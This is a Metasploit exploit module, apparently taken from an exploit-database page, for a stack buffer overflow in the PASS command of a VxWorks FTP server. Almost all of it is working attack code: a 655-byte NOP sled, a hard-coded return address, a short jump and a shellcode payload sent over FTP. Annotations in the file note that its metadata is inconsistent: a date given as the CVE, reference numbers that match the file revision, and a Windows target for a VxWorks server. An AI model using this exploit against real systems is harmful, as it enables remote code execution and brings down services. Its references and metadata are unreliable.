VxWorks FTP server Password Overflow



EKU-ID: 949 CVE: OSVDB-ID: 16850
Author: Angel Injection Published: 2011-09-09 Verified: Verified


##
# $Id: VxWorks_FTP_server.rb 16850 2011-09-07 10:20:45Z Iraq $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
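class Metasploit3 < Msf::Exploit::Remote
    Rank = AverageRanking

    include Msf::Exploit::Remote::Ftp

    # Metasploit exploit module for a stack buffer overflow in the PASS
    # command of the VxWorks FTP server (the 'Name' string keeps the
    # original "WVxWorks" spelling, which looks like a typo for VxWorks).
    #
    # Operational caveats taken from the module's own description:
    #   * only the Windows target is provided (single hard-coded return
    #     address), so reliability elsewhere is not claimed;
    #   * the server must accept anonymous logins (FTPUSER/FTPPASS come from
    #     the Ftp mixin's datastore);
    #   * a failed attempt crashes the service -- there is no check method,
    #     so run it only where taking the service down is acceptable.
    #
    # @param info [Hash] module metadata merged by update_info
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'WVxWorks FTP server Password Overflow',
            'Description'    => %q{
                    This exploits the buffer overflow found in the PASS command
                in VxWorks FTP server This particular module will only work
                reliably against Windows targets. The server must be
                configured to allow anonymous logins for this exploit to
                succeed. A failed attempt will bring down the service
                completely.
            },
            'Author'         => 'Angel Injection',
            'License'        => BSD_LICENSE,
            'Version'        => '$Revision: 16850 $',
            # NOTE(review): the original listing carried a 'CVE' entry whose
            # value was a date ('7/9/2011'), not a CVE identifier. It is
            # dropped here rather than published as a malformed reference;
            # add the real CVE-YYYY-NNNN if one exists for this issue.
            # The OSVDB/BID/URL numbers below (16850/16851) coincide with the
            # $Id revision of this file, so they may be listing IDs rather
            # than real database IDs -- verify before relying on them.
            'References'     =>
                [
                    [ 'OSVDB', '16850'    ],
                    [ 'BID', '16851'    ],
                    [ 'URL', 'http://www.1337day.com/exploits/16851' ],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process'
                },
            'Payload'        =>
                {
                    # 530 bytes available after the sled; NUL, LF, CR and '@'
                    # are excluded because the buffer travels inside an FTP
                    # command line.
                    'Space'    => 530,
                    'BadChars' => "\x00\x0a\x0d\x40",
                    'StackAdjustment' => -3200,
                    'Compat'   =>
                        {
                            # presumably excludes find-socket style payloads
                            # (the command socket is not reused) -- confirm
                            'ConnectionType' => "-find"
                        }
                },
            'Targets'        =>
                [
                    # Target 0 -- the only target. Which module the return
                    # address belongs to is not stated here; confirm before
                    # porting to another build.
                    [
                        'Windows',
                        {
                            'Platform' => 'win',
                            'Ret'      => 0x5f4e772b
                        },
                    ],
                ],
            'DefaultTarget'  => 0,
            # Kept as written; the day/month order is ambiguous (the $Id date
            # is 2011-09-07). Metasploit convention is 'Mon DD YYYY'.
            'DisclosureDate' => '7/9/2011'))
    end

    # Connects, logs in with FTPUSER and sends the overflow as the PASS
    # argument, then hands off to the payload handler.
    #
    # Buffer layout (byte offsets into buf):
    #   0..654    655-byte NOP sled, patched at two places:
    #   562..565  target.ret, little-endian (the value the overflow is
    #             expected to land in a return address -- not verifiable here)
    #   645..646  "\xeb\x06" = JMP SHORT +6: EIP after the instruction is
    #             647, so execution resumes at 653, still inside the sled,
    #             two bytes before the payload
    #   655..     payload.encoded (up to 'Space' bytes)
    def exploit
        connect

        print_status("Trying target #{target.name}...")

        buf          = make_nops(655) + payload.encoded
        buf[645, 2]  = "\xeb\x06"
        buf[562, 4]  = [ target.ret ].pack('V')

        # Send USER Command
        send_user(datastore['FTPUSER'])

        # Send PASS Command; the second argument disables waiting for a
        # reply, presumably because a successful overflow never answers.
        send_cmd(['PASS', buf], false)

        handler
        disconnect
    end

end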